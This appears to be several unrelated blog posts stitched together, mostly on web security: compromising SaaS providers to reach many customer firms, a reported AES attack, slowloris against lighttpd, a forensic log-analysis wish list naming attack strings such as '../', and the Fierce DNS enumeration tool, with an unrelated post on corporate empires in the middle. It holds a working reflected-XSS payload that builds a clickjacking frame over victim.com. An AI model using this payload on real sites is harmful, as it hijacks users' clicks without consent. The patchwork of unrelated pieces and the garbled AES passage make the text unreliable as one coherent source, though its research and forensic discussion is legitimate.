Because companies tend to point their DNS to those SaaS providers for white labeling, often you’ll see a convergence of a lot of sub-domains all pointing to a single IP address or set of IP addresses. It doesn’t take a rocket scientist to realize that you don’t need to attack the target you’re interested in, you can attack the SaaS provider and take over not just one but all of those companies in that vertical that use that provider. Even though that may not be obvious by just probing the external network, DNS can sometimes help to uncover those sorts of details. This happens a lot more than most people realize, and in my experience those cloud based SaaS providers aren’t any more secure than anyone else. It’s a lot more interesting to compromise hundreds of companies for the price of one.

Last year, a spate of attacks on AES caused the shine to come off. Vincent Rijmen, one of the designers, has now announced an attack on AES that reduces the key strength from 128 bits to 32 bits. Ouch! But theres a catch: This attack clearly endangers all practical applications where an attacker can halt the computer in the middle of the execution of an encryption routine , apply the specific difference #948; to the state, and roll back the interrupted encryption and obtain the modified plaintext p*. Which is to say, the attacker must have something else. He must be able to stop the encryption, inject some different values, and then restart it. Is this a worry? Well, no. If the attacker has that ability -- stop, inject, restart -- then the attacker probably has lots of other powers too. Yes, in that the result seems to again undermine the strength of the algorithm. As they say in cryptoland, the attacks only get better. In sum, I wouldnt be too worried. If this attack breaks you, then youve got another problem: cant be too careful about those environmental factors! But we might start to think about the replacement of AES somewhat sooner than expected (e.g., last year, Bruce Schneier suggested simply increasing the rounds of AES128 from 10 to 16) and whether we need to incorporate specific environmental defences in the next design competition. As more information comes in, especially analysis by real cryptographers rather than cryptography realists, Ill update the post. Hat tip to Alfonso De Gregorio who spotted it and added his own variant....

Those of us who do a lot of work in the security world have come to realize that there is a ton of cross site scripting (XSS) out there. 80% of dynamic sites (or more) suffer from it. But how many sites allow you to do HTML file uploads comparatively? It’s a much smaller amount, and typically requires some sort of login before you’re allowed to do it. Often times it’s protected by login too, so it’s a relatively small amount of people who could be impacted by any sort of HTML file upload. But that is precisely what’s needed to mount a clickjacking attack (usually one or two pages). Either the attacker has to rent space in the cloud with a stolen credit card, or find some parasitic hosting somewhere.

That’s when I got to thinking… how can you use any old generic reflected XSS attack to mount a clickjacking attack? A few hours later I had a prototype that worked. Here’s how the attack would work. Let’s say a parameter like “search” was vulnerable to reflected XSS. An attacker could do something like:

http://example.com/?search=<script>eval(location.hash.slice(1))</script>

This is an old trick that basically says anything that falls into the anchor tag is what the attacker wants to run as the attack. Anchor tags are not sent to the server, they are only seen on the client. So this effectively turns the reflected XSS into a DOM based XSS, which leaves less of a signature on the server as well, incidentally. Then the attacker’s anchor payload would look something like this (this works only in Firefox):

http://example.com/?search=<script>eval(location.hash.slice(1))</script>#a=document.body.appendChild(document.createElement("iframe"));a.d=a.contentDocument;a.d.open().close();i=a.d.createElement("iframe");a.style.width=90;a.style.height=90;a.style.border=i.style.border=0;a.style.position=i.style.position="absolute";a.style.overflow=i.style.overflow="hidden";a.style.opacity=.3;i.style.width=100;i.style.height=100;i.style.left=-10;i.style.top=-10;i.src="http://www.victim.com/";a.d.body.appendChild(i);function followmouse(e){xcoord=ycoord=40;xcoord+=e.pageX-50;ycoord+=e.pageY-50;a.style.left=xcoord;a.style.top=ycoord;}document.onmousemove=followmouse;

So you have a reflected XSS on example.com that instantiates a DOM based XSS which instantiates a clickjacking attack against victim.com. Obviously you’d need to modify this to actually fit the right coordinates and work in other browsers, but this could easily be used to leverage the attack in situations where an attacker might not be able to otherwise. For instance, if the clickjacking defenses only care about the referrer and the referrer is on the correct domain just a different sub-domain, that could be used to bypass it - and so on. Anyway, I thought some people might think this is interesting. Happy penetration testing!

I had heard various different reports from people who use lighttpd during the initial investigation of slowloris that it was not vulnerable. But now I’m hearing differently. From Iraklis Alexios C. Mathiopoulos:

I just tested it on a fresh/default install of the latest lighttpd with a simple index.html page (no fastcgi this time). Consistent results, 4-5 seconds after I fire slowloris from host A to “attack” server B, server’s B is unresponsive. I’m checking from host C btw in order to minimize the risk of any dos appliances that might be in the way blocking requests. host A, server B, host C are all in different geographical locations.

As soon as I stop slowloris server B becomes responsive again. Interestingly enough top doesn’t show any change in cpu/mem usage during the attack.

Btw the targeted server is running Centos 5.4 64bit on an Intel i7 with 8GB ram.

Anyone have different results to share for lighttpd? About a year has come and gone and I haven’t heard any word from the Apache camp on a fix either. Anyone heard anything about a fix in Apache’s core web server?

My experience is that big organsiations create situations where the politics of success dictate you grow your control of people and resources, even when that is counterproductive to the task you're actually supposed to be achieving. 
You see it all the time, in fact: groups which have, for example, their own HR organsiations, even when there is a central HR team supposed to do the work. Or their own communications groups, because it is "easier" to get things done when everything is located in the one place. And the list goes on and on through Finance, procurement, sales and so forth. 
Empires are wasteful because they are artifices constructed for the sole purpose of providing life-support to the Emperor in charge.
You can often see how the mechanics of disruption work not only against large companies and their operations, but against people and their empires in large organisations as well.
Now, I'm sure very few people reading here have a need for me to explain how disruption works, but just in case, you might read this wikipedia entry on the subject. The basic point is that empires get disrupted in the same two situations that companies do.
Firstly, an empire gets disrupted when someone offers to do quite a bit less than what the empire is setting out to do, but does it more nimbly and cheaply. You see this all the time. Imagine a big development shop with a heavy lifecycle process and miles of governance. When a little team pops up that can just churn out apps at a rate of knots, everyone turns to them to do the work for them, even though there is less assurance. The apps might not work at scale, but at least they work. And they're quick.
The second time an empire gets disrupted is when someone offers the services of something like the empire to a group that previously couldn't access the empire at all. The same example applies as above: most large development shops prioritise work from big paying customers - like core business lines - over the needs of smaller groups like communications. When the new little team pops up, communications is suddenly able to access the same resources as their big-money counterparts, and flock to the startup as a matter of course.
Now, initially, the startup dev group won't even be on the radar of the Empire, but sooner or later, their activities will get noticed. That will most likely happen the first time that the new group gets offered something that would be at the low end of what the Empire would normally take on.
The result is fairly predictable. The Empire will marshall its arguments that the new team should either be disbanded, or folded into the Empire entirely. They'll argue that this will result in "efficiencies" and a superior product. The organisation will be safer, because the "risky" nature of the startup will be mitigated. And blah and blah, onwards for every reason under the sun that explains why the Empire is good and the startup is bad.
The Empire is actually doing all it can to remove a threat to its existence. Even if the Emperor realise it, what the startup is doing is showing everyone that, in reality, the Empire is highly inefficient at what it does, and that's because its purpose is to sustain the top guy, not deliver good outcomes for the organisation.
Disrupting the Empire directly is rarely a successful strategy, because the critical mass of clout and resources it holds means it will always win any battle of attrition. 
On the other hand, the inefficiency of the Empire is also what kills it in the end. It attracts more and more resources in an organisation  (because it is inefficient, and therefore grows its inputs faster than it can grow its outputs) and sooner or later this gets noticed by someone with the power to do something about it.
Almost all empires get broken up in the end, usually taking the Emperor who architected the whole thing with it.  If you can wait long enough, and be beneath the radar so you don't get absorbed, the disruptive little startup group will probably be the trigger that causes this to happen.

I can’t tell you how many times over the last several years I’ve needed an application that can properly parse and help me inspect web server log files. I’ve searched around, asked friends and colleagues and nothing. The best I’ve come up with is a bunch of crappy shell scripts, grep, Splunk, libraries and a few people mentioned that event correlation systems come close to doing what I want. In the end I just end up manually grepping through files, and writing my own custom scripts that I end up having to re-write over and over again, depending on the situation and the log files themselves. Without the time to dedicate to it, and a million other things on my plate I’ve never had the opportunity to sit down and code it up. Here’s the requirements for what I need:

• Must be able to parse log files in different formats. Lots of web server logs don’t look like other web server logs - even from the same web server, depending on how they are formatted and the order that the variables get logged. IIS logs may intentionally add in cookie parameters. Some logs may not use the same delimiters and so on. A generic parser that can deal with any log in any format is what needs to be built. I know companies have built these things before, so it’s possible. Yeah, this bullet alone is a bit of a nightmare.
  
• The system must be able to take two independent and differently formatted logs and combine them. Often times in a forensics case the attacker hit more than one web server in the process of attacking the site. This happens a lot when you’re talking about static content hosted on other sites or a separate single sign on authentication server or whatever. One server might be IIS and the other Apache - so the system would have to be able to combine different lot formats and take into account that some logs may not have the same parameters in them; one might be missing query string information or host name or whatever.
  
• The system must be able to normalize by time. I can’t tell you how many times I’ve found that one of the sites involved in the forensics case isn’t using NTP and the log file is off by some arbitrary amount of time. This is a huge pain when you’re doing this by hand, let me tell you. Anyway, timezones also must be accounted for, where one server is hosted in one timezone and a different log is hosted in another.
  
• Log files are big - they can be many gigs per day, and a forensics case can span a month or more. This is where grep gets a lot less convenient and where a database would be a better choice. So the system should be able to handle just about any size of log file data, up to and including a terabyte.
  
• It should allow for regular expressions and binary logic on any parameter. Sometimes I want to check to see if something is a “POST” followed by a “5xx” error as a response code against any of the logs over N days. Or maybe I want to check for anyone who hit any file and got a different size back than everyone else who hit that same file. Or maybe I want to ignore things in certain directories or with certain file extensions, because I know that contains only static content.
  
• The system should be able to narrow down to a subset of logical culprits. That is, remove any IP addresses that never submitted a “POST” request, or any GET requests with a Query string.
  
• The system should allow for white-lists, to remove things like internal IP addresses, or known robots that weren’t involved but make a lot of suspicious requests (third party scanners and such).
  
• The system should also build a probable culprits list that you can pivot against. If you know N IP addresses are suspicious, you should be able to run commands against just those IP addresses, without re-searching all the non-suspicious IP addresses. That way you can gradually narrow down the list further and further so you are only looking at things that interest you.
  
• The system should be able to maintain a list of suspicious requests that indicate a potential compromise, like “../” and “=http://” and so on, to quickly narrow down a list of culprits, without having to do a lot of manual searching.
  
• The system should decode URL data so that it can be searched easier. This could be really tricky given how many encoding methods there are out there, but even just URL would be a huge time saver.
  
• The software must use the BSD license - so it can be used in any capacity, and modified as necessary. Because GNU just won’t cut it.

So yeah, if anyone is just looking to build something extremely useful to guys like me, and feels like making it open source so anyone else can use it, please do! The forensics community could really use something like this. I sure know I’d use it!

A few years back I wrote a tool to do DNS enumeration. The point of it was that it is incredibly difficult to do an accurate penetration test against a target when you don’t know what to attack. The only way to know that is to find all the machines associated with that domain/customer or whatever. After a weekend or so of coding I came up with a functional, albeit crappy Perl program that did just that. A few people took note, a lot of people called me out for my crappy programming (rightfully) and ultimately it sat nearly stagnant for a few years. That is until I met Jabra.

Jabra (who works for Rapid7) is a bad ass Perl developer, at least compared to yours truly. He completely re-wrote Fierce, taking in my wish-list and a whole new set of features he wanted, like XML support to quickly integrate with nmap and all kinds of other stuff. Hopefully sometime next week we’ll have a released version. In the meantime please go and check out the beta of Fierce 2.0. Feedback is welcome!